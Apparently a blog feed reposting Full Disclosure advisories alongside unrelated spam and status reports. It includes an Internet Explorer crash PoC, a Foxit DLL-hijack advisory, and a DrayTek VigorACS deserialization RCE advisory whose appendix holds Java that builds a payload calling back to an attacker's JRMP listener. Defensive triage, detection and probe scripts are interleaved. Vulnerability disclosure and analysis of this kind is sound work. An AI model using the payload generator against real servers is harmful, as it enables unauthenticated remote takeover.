[FD] wifi and z-wave smart home from zibreo

Hi manager,

I’m Chris from Zibreo, a leading producer of home automation based in Shenzhen, China.
1) We have WiFi smart plugs, water detectors, PIR motion sensors, RGB bulbs etc.; they can work with Amazon Alexa, Google Home and IFTTT.
2) Our Z-Wave devices are compatible with all Z-Wave controllers on the market, such as Fibaro, SmartThings etc.
3) Battery-operated, with a 2-year lifetime.
Contact me if you need further details. Thanks.

Chris

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-wifi-and-z-wave-smart-home-from.html


[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 – Denial Of Service

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://ift.tt/2HEjHve
[+] ISR: ApparitionSec

Vendor:
=======
www.microsoft.com

Product:
========
Internet Explorer (Windows 10) v11.371.16299.0

Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

Vulnerability Type:
==================
Denial Of Service

CVE Reference:
==============
N/A

Security Issue:
================
A null pointer de-reference (read) results in an Internet Explorer Denial of Service (crash) when MSIE encounters a specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself; if that occurs and the user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end user’s MSIE browser.

Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same 🙂

Tested Windows 10

Stack Dump:
==========
(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3              ret
0:015> r
rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003
rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003
rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3              ret

CONTEXT:  (.ecxr)
rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000
rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000
rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600
 r8=0000000000000000  r9=0000000000008000 r10=00007ffabb499398
r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060
r14=0000000000000002 r15=0000000000000001
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
KERNELBASE!StrCmpICW+0x6:
00007ffa`bb7fc646 450fb70b        movzx   r9d,word ptr [r11] ds:00000000`00000000=????
Resetting default scope

FAULTING_IP:
KERNELBASE!StrCmpICW+6
00007ffa`bb7fc646 450fb70b        movzx   r9d,word ptr [r11]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000

DEFAULT_BUCKET_ID:  NULL_POINTER_READ

PROCESS_NAME:  iexplore.exe

POC video URL:
==============
https://ift.tt/2JeIZx3

Exploit/POC:
============
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10

# NOTE: the HTML tags of the original payload (including the crashing HREF)
# did not survive archiving of this advisory; only the text nodes remain below.
payload=('\n'+
'MSIE v11.371.16299 Denial Of Service by hyp3rlinx\n'+
'crashy ware shee\n'+
'\n'+
'Tested successfully on Windows 10\n'+
'')

file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()

print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
=============================
Vendor Notification: April 18, 2018
Vendor closes thread: April 19, 2018
April 20, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx


from Blogger http://insidenothing.blogspot.com/2018/04/fd-microsoft-win-10-internetexplorer.html
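The advisory above bucketed the crash as NULL_POINTER_READ and rated it Medium. The following is an added example, not part of hyp3rlinx's advisory, of the first-pass triage a crash analyst does on WinDbg output to reach the same conclusion: parse the exception record and decide, from the access-violation parameters, whether the fault is a read of the null page (denial of service only) or something that deserves deeper analysis. The sample text is constructed from the dump lines quoted in the advisory; the read/write/execute encoding of Parameter[0] follows the documented Win32 EXCEPTION_RECORD semantics.

```python
import re

# Constructed sample: the exception record and bucket lines from the WinDbg
# output quoted in the advisory, trimmed to what the triage needs.
SAMPLE_DUMP = """\
FAULTING_IP:
KERNELBASE!StrCmpICW+6
00007ffa`bb7fc646 450fb70b        movzx   r9d,word ptr [r11]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000

DEFAULT_BUCKET_ID:  NULL_POINTER_READ

PROCESS_NAME:  iexplore.exe
"""

# EXCEPTION_ACCESS_VIOLATION parameters (Win32 EXCEPTION_RECORD documentation):
# Parameter[0] is the access type, Parameter[1] the faulting address.
ACCESS_TYPES = {0: "read", 1: "write", 8: "execute"}
STATUS_ACCESS_VIOLATION = 0xC0000005
NULL_PAGE_LIMIT = 0x10000  # the first 64 KiB are never mapped in user mode


def parse_exception_record(text):
    """Pull the fields triage needs out of WinDbg `.exr` / `!analyze` text."""
    def grab(pattern):
        m = re.search(pattern, text, re.M)
        if not m:
            raise ValueError("missing field: %s" % pattern)
        return m.group(1)

    params = [int(p, 16) for p in re.findall(r"Parameter\[\d\]:\s+([0-9a-fA-F]+)", text)]
    return {
        "faulting_ip": grab(r"FAULTING_IP:\s+(\S+)"),
        "code": int(grab(r"ExceptionCode:\s+([0-9a-fA-F]+)"), 16),
        "params": params,
        "bucket": grab(r"DEFAULT_BUCKET_ID:\s+(\S+)"),
        "process": grab(r"PROCESS_NAME:\s+(\S+)"),
    }


def triage(rec):
    """Classify an access violation the way a first-pass crash triage would."""
    if rec["code"] != STATUS_ACCESS_VIOLATION or len(rec["params"]) < 2:
        return "not-an-access-violation"
    access = ACCESS_TYPES.get(rec["params"][0], "unknown")
    address = rec["params"][1]
    if access == "read" and address < NULL_PAGE_LIMIT:
        # A read from the null page cannot be steered anywhere useful: DoS only.
        return "null-read-dos"
    if access == "write":
        return "write-av-investigate"
    if access == "execute":
        return "dep-violation-investigate"
    return "read-av-investigate"


if __name__ == "__main__":
    record = parse_exception_record(SAMPLE_DUMP)
    print(record["faulting_ip"], record["bucket"], triage(record))
```

On the advisory's dump this yields `null-read-dos`, matching the NULL_POINTER_READ bucket: r11 is zero at the `movzx r9d, word ptr [r11]` in StrCmpICW, so the attacker controls neither the address read nor anything written. A write or a read from an attacker-influenced address would move the case into the "investigate" categories.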

ISS Daily Summary Report – 4/19/2018

Miniature Exercise Device (MED-2): The crew set up cameras in Node 3 to capture video from multiple views of the Advanced Resistive Exercise Device (ARED) and MED-2 hardware. They applied body markers, performed dead lifts and rowing exercises and then transferred the video for downlink. The ISS’s exercise equipment is large and bulky, while the …

from ISS On-Orbit Status Report https://ift.tt/2vsqCml

from Blogger http://insidenothing.blogspot.com/2018/04/iss-daily-summary-report-4192018.html

8th St.’s surf is at least 5.36ft high

Maryland-Delaware, April 26, 2018 at 04:00AM

8th St. Summary
At 4:00 AM, surf min of 5.36ft. At 10:00 AM, surf min of 4.46ft. At 4:00 PM, surf min of 3.41ft. At 10:00 PM, surf min of 2.43ft.

Surf maximum: 6.36ft (1.94m)
Surf minimum: 5.36ft (1.63m)
Tide height: 3.22ft (0.98m)
Wind direction: WSW
Wind speed: 11.02 KTS

from Surfline https://ift.tt/1kVmigH

from Blogger http://insidenothing.blogspot.com/2018/04/8th-sts-surf-is-at-least-536ft-high.html

[FD] Foxit Reader ( Unsafe DLL Loading Vulnerability )

Author: Ye Yint Min Thu Htut

1. OVERVIEW
The Foxit Reader is vulnerable to an Insecure DLL Hijacking Vulnerability. Similar terms that describe this vulnerability have come up, such as Remote Binary Planting and Insecure DLL Loading/Injection/Hijacking/Preloading.

2. PRODUCT DESCRIPTION
Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files. Foxit Reader is developed by Fremont, California-based Foxit Software Incorporated. Early versions of Foxit Reader were notable for startup performance and small file size.

3. VULNERABILITY DESCRIPTION
The Foxit Reader application passes an insufficiently qualified path in loading an external library when a user launches the application.

Affected Library List


from Blogger http://insidenothing.blogspot.com/2018/04/fd-foxit-reader-83121155-unsafe-dll.html
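The advisory above describes the generic DLL-hijacking condition: a library loaded by name through an insufficiently qualified path, so the loader resolves it from the application directory or the working directory before System32. As an added example that is not part of the advisory and makes no claim about which libraries Foxit Reader loads, the check below runs over a loaded-module list (the kind exported from Process Explorer or `listdlls`) and flags DLLs carrying a System32 name that were resolved from somewhere else. The application path, working directory, module list and the short list of system DLL names are all constructed for the example.

```python
import ntpath

# Directories from which Windows' own DLLs are expected to load (native and WOW64).
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# DLL names that exist in System32 and are typically requested by an unqualified
# LoadLibrary("name.dll"). Constructed starter list: extend it from the target's
# import table or a Process Monitor "NAME NOT FOUND" trace.
SYSTEM_DLL_NAMES = {"version.dll", "dwmapi.dll", "uxtheme.dll", "cryptbase.dll", "profapi.dll"}

# Constructed sample for a hypothetical viewer; not any real application's module list.
SAMPLE_EXE = r"C:\Program Files\ExampleViewer\Viewer.exe"
SAMPLE_CWD = r"C:\Users\alice\Downloads"
SAMPLE_MODULES = [
    SAMPLE_EXE,
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Windows\System32\uxtheme.dll",
    r"C:\Program Files\ExampleViewer\ViewerCore.dll",  # vendor's own DLL, expected here
    r"C:\Program Files\ExampleViewer\version.dll",     # system DLL name, wrong directory
    r"C:\Users\alice\Downloads\dwmapi.dll",            # system DLL name, loaded from CWD
]


def _norm_dir(path):
    """Lower-cased directory part of a Windows path, without a trailing backslash."""
    return ntpath.dirname(path).lower().rstrip("\\")


def find_planted_dlls(exe_path, module_paths, system_dll_names=SYSTEM_DLL_NAMES, cwd=None):
    """Return (path, reason) for each DLL that looks hijacked: a System32 DLL name
    resolved from the application directory, the working directory, or any other
    non-system location, plus any DLL at all that came from the working directory."""
    app_dir = _norm_dir(exe_path)
    cwd_dir = cwd.lower().rstrip("\\") if cwd else None
    findings = []
    for path in module_paths:
        name = ntpath.basename(path).lower()
        directory = _norm_dir(path)
        if not name.endswith(".dll") or directory in SYSTEM_DIRS:
            continue  # not a DLL, or loaded from where it belongs
        if name in system_dll_names:
            if directory == app_dir:
                findings.append((path, "system DLL name loaded from application directory"))
            elif cwd_dir and directory == cwd_dir:
                findings.append((path, "system DLL name loaded from current working directory"))
            else:
                findings.append((path, "system DLL name loaded outside a system directory"))
        elif cwd_dir and directory == cwd_dir and directory != app_dir:
            findings.append((path, "DLL loaded from current working directory"))
    return findings


if __name__ == "__main__":
    for path, reason in find_planted_dlls(SAMPLE_EXE, SAMPLE_MODULES, cwd=SAMPLE_CWD):
        print("%-50s %s" % (path, reason))
```

The check only sees the symptom. The fix belongs in the application: load with a fully qualified path, or restrict the search order with `SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)` / the equivalent `LoadLibraryEx` flags, so that a DLL planted beside the document or the executable is never a candidate.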

[FD] [CVE-2017-5641] – DrayTek Vigor ACS 2 Java Deserialisation RCE

Hi all,

tl;dr DrayTek Vigor ACS server, a remote enterprise management system for DrayTek routers, uses a vulnerable version of the Adobe / Apache Flex Java library that has a deserialisation vulnerability. This can be exploited by an unauthenticated attacker to achieve RCE as root / SYSTEM on all versions until 2.2.2.

Full advisory is below, and a copy of it plus the exploit code is in my repo https://ift.tt/2F2oVLO.

Thanks to Beyond Security SSD programme for helping me disclose this vulnerability to the vendor. You can find details on their blog at https://ift.tt/2qFTjqa

====

>> DrayTek VigorACS 2 Unsafe Flex AMF Java Object Deserialization
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 18/04/2018 / Last updated: 19/04/2018

>> Background and summary
From the vendor’s website [1]:
“VigorACS 2 is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer’s DrayTek devices.”

VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2].

One of the endpoints exposed by VigorACS, at /ACSServer/messagebroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version that is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization of Flex AMF objects, which can be abused to achieve unauthenticated remote code execution as root under Linux or SYSTEM under Windows.

This vulnerability was disclosed under the Beyond Security SecuriTeam Secure Disclosure (SSD) programme, which has provided assistance to the vendor throughout the disclosure process [4].

>> Technical details:
Vulnerability: Unsafe Flex AMF Java Object Deserialization
CVE-2017-5641
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v2.2.1; earlier versions most likely affected

By sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes:
…Unsupported AMF version XXXXX…

While in the server logs, a stack trace will be produced that includes the following:
flex.messaging.io.amf.AmfMessageDeserializer.readMessage
…
flex.messaging.endpoints.amf.SerializationFilter.invoke
…
…

A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description:
“Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.”

Further reading in [5], [6] and [7] led to proof of concept code (Appendix A) that creates a binary payload that can be exploited to achieve remote code execution through unsafe Java deserialization.

A fully working exploit has been released with this advisory that works in the following way:
a) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [6] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker
b) receives the JRMP connection with ysoserial’s JRMP listener [8]
c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server
d) executes code as root / SYSTEM

The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [8], or alternatively a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained - see [9]).

Appendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [6], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability.

A copy of the Java source code in Appendix A, together with the actual exploit code and the ysoserial patch needed to enable multi argument handling, can be fetched from [10].

>> Fix:
Upgrade to DrayTek VigorACS version 2.2.2 as per the vendor instructions [11].

>> Appendix A:
===
import flex.messaging.io.amf.MessageBody;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.AmfMessageSerializer;
import java.io.*;

// Usage: java ACSFlex <attacker-host> <attacker-port> <output-file>
// Writes an AMF message whose body is a java.rmi UnicastRef pointing at the
// attacker's JRMP listener (step a) of the exploit).
public class ACSFlex {

    public static void main(String[] args) {
        Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));

        // serialize object to AMF message
        try {
            byte[] amf = serialize(unicastRef);
            DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));
            os.write(amf);
            os.close();
            System.out.println("Done, payload written to " + args[2]);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // A UnicastRef for host:port; when the server deserializes it, the RMI runtime
    // opens a JRMP connection back to that endpoint.
    public static Object generateUnicastRef(String host, int port) {
        java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
        sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);
        sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);
        return new sun.rmi.server.UnicastRef(liveRef);
    }

    // Wrap the object in a single-body ActionMessage and serialize it with BlazeDS.
    public static byte[] serialize(Object data) throws IOException {
        MessageBody body = new MessageBody();
        body.setData(data);
        ActionMessage message = new ActionMessage();
        message.addBody(body);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        AmfMessageSerializer serializer = new AmfMessageSerializer();
        serializer.initialize(SerializationContext.getSerializationContext(), out, null);
        serializer.writeMessage(message);
        return out.toByteArray();
    }
}
===

>> References:
[1] https://ift.tt/2F1qWIl
[2] https://ift.tt/2HKSsMZ
[3] https://ift.tt/2vwN7q8
[4] https://ift.tt/2qFTjqa
[5] https://ift.tt/2nXrCHF
[6] https://ift.tt/2vxuPVS
[7] https://ift.tt/2q7G18y
[8] https://ift.tt/1MlRZLw
[9] https://ift.tt/2HPzyVy
[10] https://ift.tt/2F2oVLO
[11] https://ift.tt/2vwN9OM

================
Agile Information Security Limited
https://ift.tt/1JewOIU
>> Enabling secure digital business >>


from Blogger http://insidenothing.blogspot.com/2018/04/fd-cve-2017-5641-draytek-vigor-acs-2.html
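The advisory's first technical step is a fingerprint: POST random bytes to /ACSServer/messagebroker/amf and look for "Unsupported AMF version XXXXX" in a 200 OK reply. The following is an added example, not part of Pedro Ribeiro's advisory or exploit, of doing that check deliberately rather than with random data. It rests on one assumption about BlazeDS, stated in the code: the deserializer reads the first two bytes of the body as a big-endian AMF version, accepts only 0 and 3, and echoes any other value in the error text (which is what the XXXXX stands for). Choosing that value lets you confirm the reply is the live endpoint parsing your bytes rather than a canned error page. The sample reply and the hostname in the docstring are constructed; `probe()` is the only function that touches the network.

```python
import re
import struct
import urllib.error
import urllib.request

AMF_PATH = "/ACSServer/messagebroker/amf"
MARKER = "Unsupported AMF version"

# Assumption about BlazeDS: AmfMessageDeserializer.readMessage reads the body's
# first u16 (big-endian) as the AMF version, accepts only 0 (AMF0) and 3 (AMF3),
# and otherwise raises "Unsupported AMF version <n>" with the value it read.
VALID_AMF_VERSIONS = (0, 3)


def build_probe(version=0x1337):
    """Probe body: a deliberately invalid 16-bit AMF version followed by filler,
    so the request is non-empty but cannot be a well-formed AMF message."""
    if version in VALID_AMF_VERSIONS or not 0 <= version <= 0xFFFF:
        raise ValueError("pick an invalid 16-bit AMF version")
    return struct.pack(">H", version) + b"\x00" * 6


def matches_probe(status, body, version):
    """True only when the reply is the BlazeDS error echoing *our* version.
    Checking the number, not just the marker string, distinguishes a live Flex
    endpoint from a WAF or honeypot replaying a fixed error page."""
    if status != 200:
        return False
    text = body.decode("latin-1", "replace")
    m = re.search(MARKER + r" (\d+)", text)
    return m is not None and int(m.group(1)) == version


def probe(base_url, version=0x1337, timeout=5):
    """Live check, e.g. probe("http://acs.example.internal:8080") -> bool.
    The hostname is a placeholder; only test systems you are authorised to test."""
    req = urllib.request.Request(
        base_url.rstrip("/") + AMF_PATH,
        data=build_probe(version),
        headers={"Content-Type": "application/x-amf"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return matches_probe(resp.status, resp.read(), version)
    except urllib.error.HTTPError as err:
        return matches_probe(err.code, err.read(), version)


# Constructed sample reply: an AMF error body echoing version 0x1337 (4919).
SAMPLE_REPLY = b"\x00\x03\x00\x00\x00\x01\x00\x0b/onStatus...Unsupported AMF version 4919..."

if __name__ == "__main__":
    print(matches_probe(200, SAMPLE_REPLY, 0x1337))
```

A positive result only says a Flex/BlazeDS AMF endpoint is reachable without authentication; whether it is still the vulnerable version is what the 2.2.2 upgrade in the advisory addresses, so treat the probe as a way to find exposed ACS servers to patch, not as proof of exploitability.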